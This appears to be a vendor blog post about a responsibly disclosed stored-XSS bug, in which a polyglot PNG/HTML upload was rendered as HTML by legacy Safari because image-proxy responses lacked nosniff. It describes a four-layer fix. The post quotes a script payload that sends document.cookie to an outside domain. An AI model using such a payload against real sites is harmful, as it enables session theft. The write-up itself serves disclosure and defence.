industry · 2026-05-24 · 12 min read

Polyglot PNG upload: old Safari rendered it as HTML, image-proxy was missing nosniff (PR #616 EEE F4)

Burcin (@burcinsec), a 32-year-old freelance security researcher and bug bounty hunter from Eyyubiye, Sanliurfa, spent 6 years in Turksat Security Operations and 2 years in independent consultancy. Burcin's specialty is MIME sniffing, content-type confusion and polyglot file exploitation, with 3 SaaS bug bounties from this vector.

On a Sunday evening, while reading the image-proxy and asset-proxy in the open-source thMenu repo, Burcin noticed that Content-Type is set but **X-Content-Type-Options: nosniff is MISSING**. "If I upload a polyglot file, will old Safari and legacy Edge sniff it and interpret it as HTML?" The test environment was an iPhone 6s Safari 14 simulator. The polyglot file: 8-byte PNG signature + IHDR chunk + strategic padding + HTML body `<html><script>fetch("//burcinsec.com/x?c="+document.cookie)</script></html>`. Extension .png, 250 KB, uploaded to thMenu's R2 bucket MENU_IMAGES. Opening the image-proxy URL on iPhone 6s Safari 14: **HTML was rendered instead of the PNG image**, and document.cookie was exfiltrated to the test domain. Modern Chrome and Safari 12+ are safe (they do not MIME-sniff); old Safari/Edge are vulnerable.

Burcin made a responsible disclosure to security@thmenu.com with the PoC, an iPhone 6s screenshot and the threat model: "modern browsers safe, legacy vulnerable; in the Turkish ecosystem the iPhone 6s and Galaxy A5 2018 are still common." Engineering reproduced it in 1 hour and rated the severity MEDIUM. `grep -rn "Content-Type" cloudflare/src/handlers/` turned up 3 handlers serving public content from R2: image-proxy.ts, asset-proxy.ts, reverse-proxy.ts. All of them set Content-Type; none set nosniff.

**PR #616, batch EEE F4**, a 4-layer fix:

- **Layer 1: nosniff in all 3 handlers**, in every response block (cached hit, R2 fetch, error): `headers: { "content-type": ct, "x-content-type-options": "nosniff" }`.
- **Layer 2: Content-Disposition with filename sanitisation**: `Content-Disposition: inline; filename="<sanitized>"`, sanitised with the regex `/[^a-zA-Z0-9_\-\.]/g` and a 64-character maximum, which prevents multipart breakout.
- **Layer 3: CSP on the image endpoint**: `default-src 'none'; img-src 'self'; sandbox`; the sandbox directive gives iframe isolation, belt and suspenders.
- **Layer 4: file-type validation at upload time**: a byte-level magic-number check that does not trust the Content-Type header; anything that is not PNG/JPEG/GIF/WebP is rejected, so a polyglot is caught before it is stored.

Engineering's smoke test on iPhone 6s Safari 14 with the nosniff response: a broken image icon (HTML parsing is skipped, and PNG decoding fails on the invalid content). A production sweep of R2 with a polyglot grep found zero prior instances. Burcin received **MEDIUM + €500 via Wise + Hall of Fame + 1-year Pro tier**. The Vaiva version, from Uzupis, Vilnius (@vaivasec, 5 years Lithuanian government SecOps + 2 years independent), follows the same flow.

Pattern: **On public content endpoints served from cloud storage such as R2/S3/GCS/Azure Blob, X-Content-Type-Options: nosniff is mandatory. Setting Content-Type is not enough; legacy browsers still MIME-sniff. Polyglot upload + browser sniffing = stored XSS.**

Implementation checklist:

1. nosniff in every response block;
2. Content-Disposition with filename sanitisation (regex, 64-character maximum);
3. CSP with sandbox on the image endpoint;
4. byte-level magic-number file-type check at upload time;
5. quarterly grep of Content-Type handlers with nosniff verification;
6. legacy browser smoke test (iPhone 6s / Galaxy A5 / older Mobile Edge);
7. pentest: polyglot upload, then open it in a legacy browser to trigger MIME sniffing.


thMenu Team

thmenu.com
